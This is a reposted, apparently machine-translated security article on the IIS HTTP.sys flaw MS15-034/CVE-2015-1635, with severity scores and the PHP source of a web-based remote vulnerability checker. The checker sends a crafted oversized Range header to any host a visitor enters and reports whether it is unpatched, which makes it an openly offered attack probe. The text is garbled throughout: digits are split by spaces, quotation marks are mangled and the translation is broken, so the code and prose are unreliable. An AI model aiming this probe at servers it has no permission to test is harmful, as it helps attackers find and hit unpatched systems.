Lucene search

K
myhack58佚名MYHACK58:62201561261
HistoryApr 16, 2015 - 12:00 a.m.

IIS the latest high-risk Vulnerability, CVE-2 0 1 5-1 6 3 5, AND MS15-0 3 4. THE POC and online detection of source-vulnerability warning-the black bar safety net

2015-04-1600:00:00
佚名
www.myhack58.com
52

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

! [](/Article/UploadPic/2015-4/2 0 1 5 4 1 6 1 3 3 1 4 6 3 4 9. png)
HTTP. sys remote code execution vulnerability, CVE-2 0 1 5-1 6 3 5, AND MS15-0 3 4. the
A remote code execution vulnerability exists in the HTTP Protocol stack (HTTP.sys), when the HTTP.sys not correct parsing specially crafted HTTP request to cause this vulnerability. Successful exploitation of this vulnerability an attacker can be in the system account context in the execution of arbitrary code. https://technet.microsoft.com/zh-cn/library/security/MS15-034
Line detection source code
!
php
class VulnStatus
{
const FAIL = 0;
const VULN = 1;
const VULN_NOT_MS = 2;
const PATCHED = 3;
const NOT_VULN = 4;
const NOT_VULN_MS = 5;
const NOT_VULN_CF = 6;
public static function AsString( $status, $host )
{
switch( $status )
{
case self::FAIL : return ';unable to connect to '; . $host . ‘; Test loophole.’;;
case self::VULN : return ‘;’; . $host . ‘; The presence of vulnerability.’;;
case self::VULN_NOT_MS: return ‘;’; . $host . ‘; There may be loopholes, but it seems to not use IIS.’;;
case self::PATCHED : return ‘;’; . $host . ‘; Has been repaired.’;;
case self::NOT_VULN : return ';can’t identify the patch status '; . $host . ‘;, And not using IIS, there may be no loopholes.’;;
case self::NOT_VULN_MS: return ';can’t identify the patch status '; . $host . ‘;. There may be no loopholes.’;;
case self::NOT_VULN_CF: return ‘;’; . $host . ‘; Possible use of the CloudFlare CDN acceleration, causes the vulnerability can not be detected or does not exist.’;;
}
return ‘;as if broken.’;;
}
}
$host = false;
$status = false;
$url = filter_input( INPUT_GET, ‘;host’;, FILTER_SANITIZE_URL );
if( ! empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null )
{
$url = ‘;http://’; . $url;
}
$port = parse_url( $url, PHP_URL_PORT );
if( $port === null )
{
$port = 8 0;
}
$url = parse_url( $url, PHP_URL_HOST );
if( $url !== null )
{
$cachekey = ‘;ms15034_’; . $url . ‘;_’; . $port;
$cachetime = 3 0 0; // 5 minutes
$host = htmlspecialchars( $url, ENT_HTML5 );
if( $port !== 8 0 )
{
$host .= ‘;:’; . $port;
}
$memcached = new Memcached( );
$memcached->addServer( ‘;/var/run/memcached/memcached. sock’;, 0 );
$status = $memcached->get( $cachekey );
if( $status === false )
{
$fp = @fsockopen( $url, $port, $errno, $errstr, 5 );
if( $fp === false )
{
$status = VulnStatus::FAIL;
}
else
{
stream_set_timeout( $fp, 5 );
$header = “GET / HTTP/1.1\r\n”;
$header .= “Host: stuff\r\n”;
$header .= “Range: bytes=0-18446744073709551615\r\n”;
$header .= “Connection: close\r\n\r\n”;
fwrite( $fp, $header );
$response = fread( $fp, 1 0 2 4 );
fclose( $fp );
if( strpos( $response, ‘;your request range does not meet’; ) !== false )
{
$status = strpos( $response, ‘;Microsoft’; ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;
}
else if( strpos( $response, ‘;requests an invalid header head’; ) !== false )
{
$cachetime = 3 6 0 0; // cache time
$status = VulnStatus::PATCHED;
}
else if( strpos( $response, ‘;Microsoft’; ) === false )
{
if( strpos( $response, ‘;4 0 3 Forbidden’; ) !== false && strpos( $response, ‘;cloudflare-nginx’; ) !== false )
{
$status = VulnStatus::NOT_VULN_CF;
}
else
{
$status = VulnStatus::NOT_VULN;
}
}
else
{
$status = VulnStatus::NOT_VULN_MS;
}
}
unset( $fp, $header, $response );
$memcached->set( $cachekey, $status, $cachetime );
}
$status = VulnStatus::AsString( $status, $host );
}
?& gt;
charset=“utf-8”>
name=“theme-color” content=“#4 2 4 2 4 2”>
http-equiv=“X-UA-Compatible” content=“IE=edge,chrome=1”>
name=“viewport” content=“width=device-width, initial-scale=1.0”>
MS15-0 3 4 Test
href=“//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css” rel=“stylesheet”>
type=“text/css”>
. container {
max-width: 900px;
}
. masthead {
position: relative;
padding: 20px 0;
text-align: center;
color: #fff;
background-color: #4 2 4 2 4 2;
margin-bottom: 20px;
}
. masthead a {
color: #fff;
}
. footer {
text-align: center;
padding: 15px;
color: #5 5 5;
}
. footer span {
color: #FA5994;
}
. form-inline {
text-align: center;
margin-bottom: 20px;
}
. github {
position: absolute;
top: 0;
right: 0;
}
HTTP.sys stack vulnerability testing
Enter a URL or a hostname to test the server href=“https://technet.microsoft.com/en-us/library/security/ms15-034.aspx” target=“_blank”>MS15-0 3 4 / href=“http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635” target=“_blank”>CVE-2 0 1 5-1 6 3 5.

[1] [[2]](<61261_2. htm>) next

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%